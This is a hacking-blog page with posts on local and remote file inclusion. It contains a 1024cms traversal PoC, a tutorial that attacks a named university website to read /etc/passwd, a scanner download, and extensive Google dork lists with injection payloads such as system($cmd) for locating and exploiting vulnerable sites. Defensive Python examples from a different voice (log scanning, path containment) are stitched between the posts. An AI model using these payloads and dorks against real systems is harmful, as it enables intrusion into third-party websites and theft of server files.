
Showing posts with label LFI(Local File Inclusion). Show all posts

Thursday, April 21, 2011

LFI Vulnerability in 1024cms Admin Control Panel v1.1.0 Beta

========================================================
1024cms Admin Control Panel v1.1.0 Beta (Master-cPanel Package) - 
Local File Include Vulnerability
========================================================

Software: 1024cms Admin Control Panel v1.1.0 Beta (master-cpanel package)
Vendor:
http://1024cms.org/
Vuln Type: Local File Include
Remote: Yes
Local: No
Discovered by: QSecure and Demetris Papapetrou
Website:
http://www.qsecure.com.cy
Discovered: 15/03/2011
Reported: 29/03/2001
Disclosed:


VULNERABILITY DESCRIPTION:
==========================
The script "/index.php" is prone to a local file-include vulnerability because it fails 
to properly sanitize user-supplied input in the "processfile" parameter.

An attacker can exploit this vulnerability to obtain potentially sensitive information 
and execute arbitrary local scripts in the context of the webserver process. This 
may allow the attacker to compromise the application and the underlying computer; 
other attacks are also possible.


PoC Exploit:
============
/index.php?mode=login&processfile=../../../../../../etc/passwd
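From a defender's side, the PoC above is easy to recognise in web server logs: the `processfile` value climbs out of the web root with repeated `../` and names `/etc/passwd`. The following Python is an added example (not part of the advisory or of 1024cms) that runs a traversal check over constructed access-log lines in combined log format; the hosts, timestamps and sizes are made up, and the single- and double-URL-encoded variants are assumed forms of the same payload, included so the decoder can be seen handling them.

```python
import re
from urllib.parse import unquote

# Constructed sample of combined-format access log lines (hosts, times and sizes
# are made up). Line 2 carries the advisory's PoC payload; lines 3 and 5 carry
# single- and double-URL-encoded variants of the same traversal.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Apr/2011:10:01:02 +0000] "GET /index.php?mode=login HTTP/1.1" 200 512
203.0.113.7 - - [21/Apr/2011:10:01:09 +0000] "GET /index.php?mode=login&processfile=../../../../../../etc/passwd HTTP/1.1" 200 1844
203.0.113.7 - - [21/Apr/2011:10:01:15 +0000] "GET /index.php?mode=login&processfile=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1844
198.51.100.4 - - [21/Apr/2011:10:02:00 +0000] "GET /index.php?mode=login&processfile=welcome.php HTTP/1.1" 200 900
198.51.100.4 - - [21/Apr/2011:10:02:30 +0000] "GET /index.php?page=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1844
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# "../" (UNIX) or "..\" (Windows), as explained in the tutorial on this page.
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')
# Files the page names as targets of a successful traversal.
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/proc/self/environ")


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so a double-encoded
    payload (%252F -> %2F -> /) is inspected in its final form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_traversal(line: str):
    """Return a finding dict for one log line, or None if it looks benign."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    # Split on the raw (still encoded) '?' and '&' first, so an encoded '&'
    # inside a value cannot split the query in the wrong place.
    script, _, query = m.group("target").partition("?")
    params = []
    for pair in (query.split("&") if query else []):
        name, _, raw = pair.partition("=")
        value = decode_fully(raw)
        depth = len(TRAVERSAL_RE.findall(value))      # how many levels it climbs
        sensitive = any(s in value for s in SENSITIVE_PATHS)
        if depth or sensitive:
            params.append({"param": unquote(name), "depth": depth,
                           "sensitive": sensitive, "value": value})
    if not params:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "script": script,
            "status": int(m.group("status")), "params": params}


def scan_log(text: str):
    """Run find_traversal over every line and keep only the hits."""
    return [f for f in (find_traversal(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        for p in f["params"]:
            print(f'{f["ip"]} {f["script"]} param={p["param"]} depth={p["depth"]} '
                  f'sensitive={p["sensitive"]} status={f["status"]}')
```

The status code is carried along because a 200 on a request like line 2 is what deserves the follow-up; the detector itself keys only on the traversal depth and the file names, which is why the decoding loop matters: a rule that inspects the raw, still-encoded value misses lines 3 and 5 entirely.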

How to hack websites using LFI (Local File Inclusion): A Directory Traversal Attack

What is the root directory of a web server?

It is a specific directory on the server in which the web content is placed and can be seen by website visitors. Directories other than the root may contain sensitive data which the administrator does not want visitors to see. Everything accessible to a visitor on a website is placed in the root directory. The visitor cannot step out of the root directory.

What does ../ or ..\ (dot dot slash) mean?

The ..\ instructs the system to go one directory up. For example, suppose we are at this location: C:\xx\yy\zz. On typing ..\ we would reach C:\xx\yy.

Typing ..\ again, we would reach C:\xx.

Let's again go to location C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in folder xx. We can type ..\..\abc.txt. Typing ..\ two times takes us two directories up (that is, to directory xx), where abc.txt is placed.

Note: It is ..\ on Windows and ../ on UNIX-like operating systems.
What is a Directory Traversal attack?

Directory Traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

The goal of this attack is to access sensitive files placed on the web server by stepping out of the root directory using dot dot slash.

The following example will make everything clear.

Visit this website, which is vulnerable to a directory traversal attack:

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=notification.php

This web server is running on a UNIX-like operating system. There is a directory 'etc' on Unix/Linux which contains the configuration files of programs that run on the system. Some of the files placed in the 'etc' directory are passwd, shadow, profile and sbin.

The file etc/passwd contains the login names of users and even passwords too.

Let's try to access this file on the web server by stepping out of the root directory. Carefully see the position of the directories placed on the web server.


We do not know the actual names and contents of the directories except 'etc', which is a default name, so I have marked them as A, B, C, E or whatever.

We are in directory F, accessing the webpages of the website.


Let's type this in the URL field and press enter:

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=etc/passwd

This will search for the directory 'etc' in F. But obviously there is nothing like this in F, so it will return nothing.
Now type
http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd
Now this will step up one directory (to directory E) and look for 'etc', but again it will return nothing.
Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../etc/passwd

Now this will step up two directories (to directory D) and look for 'etc', but again it will return nothing.

So by proceeding like this, we go for this URL:

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd

It takes us 5 directories up to the main drive and then to the 'etc' directory, and shows us the contents of the 'passwd' file.
To understand the contents of the 'passwd' file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format


You can also view etc/profile, etc/services and many other files like backup files which may contain sensitive data. Some files like etc/shadow may not be accessible because they are accessible only by privileged users.
Note: If proc/self/environ is accessible, you might upload a shell on the server, which is called Local File Inclusion.

Counter Measures
1. Use the latest web server software
2. Effectively filter the user's input
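The stepping-up walk above and the second counter measure ("filter the user's input") are the two halves of the same thing, so here is one added example in Python (not the page's or any vendor's code) that replays both. It assumes a constructed layout with the web root at /var/www/html and page fragments under /var/www/html/pages, and uses posixpath to stand in for what a PHP include of an unfiltered ?page= value resolves to: `escape_trace` shows where each extra ../ lands, exactly as the tutorial walks through directories F, E, D and so on, while `contained_resolve` and `allowlisted_resolve` are the filtered versions that stop the walk.

```python
import posixpath
import re

# Constructed layout: the tutorial's "root directory" plus a pages/ folder
# from which the application includes its page fragments.
WEB_ROOT = "/var/www/html"
PAGES_DIR = posixpath.join(WEB_ROOT, "pages")


def vulnerable_resolve(page: str) -> str:
    """Mirrors an include of an unfiltered ?page= value: the parameter is
    joined onto PAGES_DIR and normalised, with no check that it stays inside."""
    return posixpath.normpath(posixpath.join(PAGES_DIR, page))


def steps_to_root(directory: str) -> int:
    """How many '../' it takes to climb from `directory` to the filesystem root."""
    return len([part for part in directory.split("/") if part])


def escape_trace(target: str, max_depth: int):
    """Replay the tutorial's walk: prefix `target` with 0..max_depth copies of
    '../' and show where each one lands. normpath discards '../' beyond the
    root, so the result stops changing once the root has been reached."""
    return [(depth, vulnerable_resolve("../" * depth + target))
            for depth in range(max_depth + 1)]


def contained_resolve(page: str):
    """Defensive counterpart: same join, but reject anything whose normalised
    path is not underneath PAGES_DIR. commonpath is used instead of
    startswith, which would wrongly accept '/var/www/html/pages_old/x.php'."""
    if "\0" in page:   # NUL bytes (not discussed on this page) are never legitimate here
        return None
    resolved = posixpath.normpath(posixpath.join(PAGES_DIR, page))
    if posixpath.commonpath([PAGES_DIR, resolved]) != PAGES_DIR:
        return None
    return resolved


def allowlisted_resolve(page: str):
    """Stricter option: only a plain file name is accepted, so '../', the
    Windows form '..\\' and sub-directories never reach the filesystem."""
    if not re.fullmatch(r"[A-Za-z0-9_-]+\.php", page):
        return None
    return contained_resolve(page)


if __name__ == "__main__":
    print(f"{steps_to_root(PAGES_DIR)} levels above {PAGES_DIR} is the root")
    for depth, where in escape_trace("etc/passwd", 5):
        print(f"{'../' * depth or '(none)':<20} -> {where}")
    for payload in ("notification.php", "../../../../../../etc/passwd"):
        print(payload, "->", contained_resolve(payload), allowlisted_resolve(payload))
```

On a Windows host the same containment check must be done with ntpath (or os.path on that host), since there both `\` and `/` separate directories; the allowlist form sidesteps that because it never lets a separator through. Real deployments should also resolve symlinks (os.path.realpath) before the commonpath check, which this lexical example skips so it can run without a filesystem.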

Learn How To Hack Websites With LFIntruder (LFI scanner)

Hi all,
I'd like to share some of my stuff with my blog visitors. It will help to scan websites for LFI (Local File Inclusion).
SnapShot:

Download mirror:
[Warning! This file can include malicious contents which you may not be aware of!]
Multiupload.com - upload your files to multiple file hosting sites!

Password: intern0t

Dork List For RFI AND LFI



RFI (Remote File Inclusion)

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
inurl:/modules/agendax/addevent.inc.php?agendax_path=
inurl:/ashnews.php?pathtoashnews=
inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=
inurl:/pm/lib.inc.php?pm_path=
inurl:/b2-tools/gm-2-b2.php?b2inc=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/modules/agendax/addevent.inc.php?agendax_path=
inurl:/includes/include_once.php?include_file=
inurl:/e107/e107_handlers/secure_img_render.php?p=
inurl:/shoutbox/expanded.php?conf=
inurl:/main.php?x=
inurl:/myPHPCalendar/admin.php?cal_dir=
inurl:/index.php/main.php?x=
inurl:/index.php?include=
inurl:/index.php?x=
inurl:/index.php?open=
inurl:/index.php?visualizar=
inurl:/template.php?pagina=
inurl:/index.php?pagina=
inurl:/index.php?inc=
inurl:/includes/include_onde.php?include_file=
inurl:/index.php?page=
inurl:/index.php?pg=
inurl:/index.php?show=
inurl:/index.php?cat=
inurl:/index.php?file=
inurl:/db.php?path_local=
inurl:/index.php?site=
inurl:/htmltonuke.php?filnavn=
inurl:/livehelp/inc/pipe.php?HCL_path=
inurl:/hcl/inc/pipe.php?HCL_path=
inurl:/inc/pipe.php?HCL_path=
inurl:/support/faq/inc/pipe.php?HCL_path=
inurl:/help/faq/inc/pipe.php?HCL_path=
inurl:/helpcenter/inc/pipe.php?HCL_path=
inurl:/live-support/inc/pipe.php?HCL_path=
inurl:/gnu3/index.php?doc=
inurl:/gnu/index.php?doc=
inurl:/phpgwapi/setup/tables_update.inc.php?appdir=
inurl:/forum/install.php?phpbb_root_dir=
inurl:/includes/calendar.php?phpc_root_path=
inurl:/includes/setup.php?phpc_root_path=
inurl:/inc/authform.inc.php?path_pre=
inurl:/include/authform.inc.php?path_pre=
inurl:index.php?nic=
inurl:index.php?sec=
inurl:index.php?content=
inurl:index.php?link=
inurl:index.php?filename=
inurl:index.php?dir=
inurl:index.php?document=
inurl:index.php?view=
inurl:*.php?sel=
inurl:*.php?session=&content=
inurl:*.php?locate=
inurl:*.php?place=
inurl:*.php?layout=
inurl:*.php?go=
inurl:*.php?catch=
inurl:*.php?mode=
inurl:*.php?name=
inurl:*.php?loc=
inurl:*.php?f=
inurl:*.php?inf=
inurl:*.php?pg=
inurl:*.php?load=
inurl:*.php?naam=
allinurl:/index.php?page= site:*.dk
allinurl:/index.php?file= site:*.dk

INURL OR ALLINURL WITH:

/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=
/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/zentrack/index.php?configFile=
/main.php?x=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/index4.php?body=
/side/index.php?side=
/main.php?page=
/es/index.php?action=
/index.php?sec=
/index.php?main=
/index.php?sec=
/index.php?menu=
/html/page.php?page=
/page.php?view=
/index.php?menu=
/main.php?view=
/index.php?page=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/index.php?show=
/tutorials/print.php?page=
/index.php?page=
/index.php?level=
/index.php?file=
/index.php?inter_url=
/index.php?page=
/index2.php?menu=
/index.php?level=
/index1.php?main=
/index1.php?nav=
/index1.php?link=
/index2.php?page=
/index.php?myContent=
/index.php?TWC=
/index.php?sec=
/index1.php?main=
/index2.php?page=
/index.php?babInstallPath=
/main.php?body=
/index.php?z=
/main.php?view=
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
/index.php?file=
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurl:PNphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=

11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=

14. allinurl:"powered by AshNews", allinurl:AshNews or allinurl: /ashnews.php
/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
replaced with:
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=

15. allinurl:.php?bodyfile=

16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

17. allinurl:forums.html
/modules.php?name=

18. allinurl:/default.php?page=home

19. allinurl:/folder.php?id=

20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=

21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

22. allinurl:application.php?base_path=
/application.php?base_path=

23. allinurl:phplivehelper
/phplivehelper/initiate.php?abs_path=

24. allinurl:phpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=

26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=

27. allinurl:/forum/
/forum/admin/index.php?inc_conf=

28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=

29. allinurl:shoutbox/expanded.php filetype:php
/shoutbox/expanded.php?conf=

30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=

31. keyword : "Powered by iUser"
/common.php?include_path=

32. allinurl: "static.php?load="
/static.php?load=

33. keyword : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

34. keyword: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=


LFI (Local File Inclusion)


acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=
